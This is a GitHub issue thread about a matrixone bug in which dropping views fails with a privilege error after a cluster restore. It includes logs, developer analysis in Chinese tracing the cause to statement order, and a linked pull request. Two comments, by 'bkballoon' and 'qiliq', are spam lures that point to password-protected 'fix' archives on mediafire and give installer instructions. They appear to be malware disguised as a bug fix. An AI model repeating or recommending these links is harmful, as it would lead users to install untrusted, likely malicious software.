### ISSUE TITLE
[Bug]: after restore cluster, drop view report 'do not have privilege to execute the statement'.

### ISSUE THREAD

**Issue by Ariznawlll** [matrixorigin/matrixone#18378]
### Is there an existing issue for the same bug?

- [X] I have checked the existing issues.

### Branch Name

main

### Commit ID

3e86fc473e0e22f6482168b833dec9bb0c9f58d1

### Other Environment Information

```Markdown
- Hardware parameters:
- OS type:
- Others:
```

### Actual Behavior

<img width="752" alt="image" src="https://github.com/user-attachments/assets/78d158f2-28d5-4287-9c85-4940a0dd67d0">

**bvt case：**
[cluster_level_snapshot_restore_cluster.txt](https://github.com/user-attachments/files/16777706/cluster_level_snapshot_restore_cluster.txt)

**出错的case：**
drop view employee_view;
drop view department_view;
drop view employee_with_department_view;

log：[restore.log](https://github.com/user-attachments/files/16777755/restore.log)

### Expected Behavior

drop view success 

### Steps to Reproduce

```Markdown
execute restore cluster case.
```

**Comment by YANGGMM** [comment]
<img width="773" alt="image" src="https://github.com/user-attachments/assets/50067966-3540-4ac0-9e73-af2be0d1bc09">
{"level":"INFO","time":"2024/08/28 14:52:14.071128 +0800","name":"cn-service","caller":"compile/compile2.go:254","msg":"insert into with snapshot","service":"dd1dccb4-4d3c-41f8-b482-5251dc7a41bf","uuid":"dd1dccb4-4d3c-41f8-b482-5251dc7a41bf","sql":"insert into `mo_catalog`.`mo_role_privs` SELECT * FROM `mo_catalog`.`mo_role_privs` {MO_TS = 1724827932985727000 }","affectRows":35}
大概率不是恢复的问题

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by YANGGMM** [comment]
应该是use db的问题
调整一下stmt的执行顺序以后没有报错了
<img width="626" alt="image" src="https://github.com/user-attachments/assets/4c3cc743-b87b-4dd3-8d80-1b03a73ade6a">

**Comment by Ariznawlll** [comment]
已验证

**Comment by Ariznawlll** [comment]
https://github.com/matrixorigin/matrixone/pull/18368

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
